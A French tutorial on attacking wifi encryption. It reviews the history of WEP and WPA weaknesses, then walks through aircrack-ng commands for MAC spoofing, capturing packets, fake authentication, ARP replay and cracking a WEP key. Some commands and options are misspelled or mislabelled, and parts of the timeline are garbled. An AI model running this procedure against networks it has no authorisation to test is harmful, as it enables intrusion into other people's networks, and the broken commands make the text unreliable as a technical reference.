Hacking Wifi WEP

    Publié le : 26-10-2019 20:53

    Cet article n'a qu'un but informatif, et nous vous rappelons que vous êtes seul résponsable de vos actes devant la loi.

    Introduction

    L'idée de cet article est de faire un bref tour d'horizon du wifi et de mettre en valeur les points faibles de cette technologie puis d'expliquer et de détaillers les différentes attaques sur le protocole WEP (d'autre articles suiverons sur les variantes d'attaques ainsi que sur les autres protocoles).

    Le wifi c'est quoi ?

    Le Wifi est un système de communication sans fils qui permet de relier entres eux plusieurs équipements (pc,téléphone,tablette,imprimante,etc). Il utilise différents protocoles de chiffrement pour communiquer (WEP,WPA, WPA2,WPA3).

    Chacun de ces protocles s'appuis lui même sur des standards cryptographiques (qui peuvent eux mêmes comporter des faiblesses, et qui peuvent être plus ou moins bien intégrer minorant ou magnifiant ces faiblesses).

    WEP (Wired Equivalent Privacy ou 802.11)

    Le WEP est le protocole de chiffrement natif du Wifi définit comme norme de chiffrement en 1999. La première vulnérabilité potentielle découverte date de septembre 1995 et concerne l'algorythme de chiffrement RC4.

    Les faiblesses et failles sont ensuites découvertes à la chaine :

    • Mai 2001 :  plaintext attack
    • Juillet 2001 : bit flipping sur la somme de contrôle CRC-32
    • Août 2001 :  attaque FMS
    • Février 2002 : Optimisation de l'attaque FMS
    • Août 2004 : Attaque par IVs unique de KoreK (chopper et chopchop)

    Des outils permettant d'utiliser ces différentes attaques voient le jour comme Weblab et Aircrack en Juillet et Août 2004. En 2010 des boitiés sont commercialisés illégalement et offre la possibilité de craquer la clé de chiffrement d'un réseau chiffré en WEP sans besoin de connaissance spécifique ni d'intervention humaine.

    WPA et WPA2 (Wi-Fi Protected Access ou 802.11i)

    Le WPA est le successeur directe du WEP. Là encore l'effort est notable mais cette méthode de chiffrement reste vulnérable aux intrusions suivant la façon dont elle est déployée (TKIP,CCMP et PSK). 

    • Novembre 2008 : Attaque Beck et Tews (sur WPA TKIP)
    • Août 2009 : Amélioration de l'attaque Beck et Tews (toujours sur WPA TKIP)
    • Juillet 2010 : Vulnérabilité Hole 196 (WPA2 CMMP)
    • Octobre 2017 : Vulnérabilité Krack (WPA et WPA2)
    • ????? : Vulnérabilité de l'authentification WPS (WPA et WPA2)
    • ????? : Attaque hors ligne après capture du hand shake (WPA2-PSK et antérieur)
    • ????? : Vulnérabilité de désauthentification (WEP,WPA,WPA2)
    • ????? : Vulnérabilité d'émulation d'adressage MAC (WEP,WPA,WPA2)

    Par ailleurs avec l'arrivé massive des nouvelles cartes graphiques comportant un GPU de type CUDA et du logiciel HashCat, il est possible d'effectuer une attaque "hors ligne" complètement indétéctable pour le réseau ciblé avec un taux de tentatives par secondes extrémements elevés.

    Pré requis logiciel :

    1. Un pc équipé du système d'exploitation Kali Linux
    2. Une carte réseau wifi permettant le mode monitor et injection (conseillé chipset Realtek 8187L)
    3. Un point d'accès wifi (de votre réseau)

    Mise en oeuvre des méthodes communes

    L'ensemble des actions suivantes sont à réalisées en mode sudo dans un shell.

    Lister ses cartes réseau

    iwconfig

    Lister ses cartes réseau wifi compatibles

    airmon-ng

    Désactiver la carte réseau

    wlan0 correspondant à la carte réseau à désactiver. La valeur entière à la suite du wlan peut être différente suivant votre matériel.

    ifconfig wlan0 down 

    Activer la carte réseau

    ifconfig wlan0 up

    Modifier l'adresse MAC de la carte réseau

    XX:XX:XX:XX:XX:XX : l'adresse mac que vous souhaitez assigner à votre carte réseau

    macchanger –m XX:XX:XX:XX:XX:XX wlan0

    Passer la carte en mode monitoring

    iwconfig wlan0 mode monitor 

    Créer une interface en mode monitor correspondant à la carte réseau

    airmong-ng start wlan0

    Scanner les réseaux disponibles à portés

    XX : le protocole de chiffrement recherché (wep, wpa ou wpa2)

    airodump-ng -–encrypt XX wlan0
    

    Mise en oeuvre des attaques spécifiques WEP

    Les paramètres :

    -a = l'adresse MAC du point d'accès

    -b = l'adresse MAC du client

    Ecouter un réseau spécifique et ecrire ses données 

    Ici nous ciblons un réseau chiffré en WEP emettant sur le canal 1 donc l'adresse mac du routeur vient remplacer XX:XX:XX:XX:XX:XX sur la carte réseau wlan0. Nous écrivons l'ensemble du contenu capturé sur dans le fichier file_out.cap.

    airodump-ng -–write file_out.cap -–canal 1 -–encrypt wep –-bssid XX:XX:XX:XX:XX:XX wlan0

    Emuler la présence d'un client du routeur

    Supposons qu'aucun client ne transmet d'information aux routeurs il suffit alors de s'associer à celui-ci pour nous permettre de rejouer les packets.

    aireplay-ng --fakeauth 0 –a XX:XX:XX:XX:XX:XX wlan0

    Attaque arp replay

    Ici nous rejouons les packets collectés dans le fichier arp_packet.cap et nous renvoyons 500 packets par seconde au routeur. Si on revient dans le shell qui éxécute airodump-ng on constate l'augmentation des #Datas. A partir de 10000#Datas ont peu casser une clé WEP 64bits à 40000 #Datas il est possible de casser une clé WEP 128bits.

    aireplay-ng --arpreplay -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC -x 500 -r file_out.cap wlan0

     Casser la clé de chiffrement

    Pour calculer la clé de chiffrement il suffit de fournir en paramètre -z le fichier qui contient les packets capturés (ici file_out.cap).

    aircrack-ng -z file_out.cap -0